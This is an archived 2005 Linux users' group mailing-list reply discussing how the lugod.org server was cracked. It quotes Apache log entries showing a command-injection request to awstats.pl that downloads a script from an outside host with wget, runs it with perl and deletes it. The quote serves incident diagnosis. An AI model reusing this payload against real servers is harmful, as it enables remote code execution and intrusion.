l i n u x - u s e r s - g r o u p - o f - d a v i s
L U G O D
 
Next Meeting:
October 20: Web Application Hacking: How to Make and Break Security on the Web
Next Installfest:
TBD
Latest News:
Oct. 10: LUGOD Installfests coming again soon
Page last updated:
2005 Feb 16 09:48

The following is an archive of a post made to our 'vox-tech mailing list' by one of its subscribers.

Report this post as spam:

(Enter your email address)
Re: [vox-tech] lugod.org cracked?
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [vox-tech] lugod.org cracked?



on Tue, Feb 15, 2005 at 02:35:49PM -0800, Rod Roark (rod@sunsetsystems.com) wrote:
> I think I found the point of entry.  From the lugod.org
> apache log:
> 
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> 

awstats was a PoE for a system I have occasional use of.  You might want
to Google for / ask about Rick Moen's discovery of global variables in
PHP.  Discussion on the BAD (Bay Area Debian) list.


Peace.

-- 
Karsten M. Self <kmself@ix.netcom.com>        http://kmself.home.netcom.com/
 What Part of "Gestalt" don't you understand?
    They caused it themselves.
     - Dick Cheney, greedy oil man lying bastard, blaming California for the
       Enron-engineered, White House-blessed power crunch, reported by AP.

Attachment: signature.asc
Description: Digital signature

_______________________________________________
vox-tech mailing list
vox-tech@lists.lugod.org
http://lists.lugod.org/mailman/listinfo/vox-tech


LinkedIn
LUGOD Group on LinkedIn
Sign up for LUGOD event announcements
Your email address:
facebook
LUGOD Group on Facebook
'Like' LUGOD on Facebook:

Hosting provided by:
Sunset Systems
Sunset Systems offers preconfigured Linux systems, remote system administration and custom software development.

LUGOD: Linux Users' Group of Davis
PO Box 2082, Davis, CA 95617
Contact Us

LUGOD is a 501(c)7 non-profit organization
based in Davis, California
and serving the Sacramento area.
"Linux" is a trademark of Linus Torvalds.

Sponsored in part by:
EDGE Tech Corp.
For donating some give-aways for our meetings.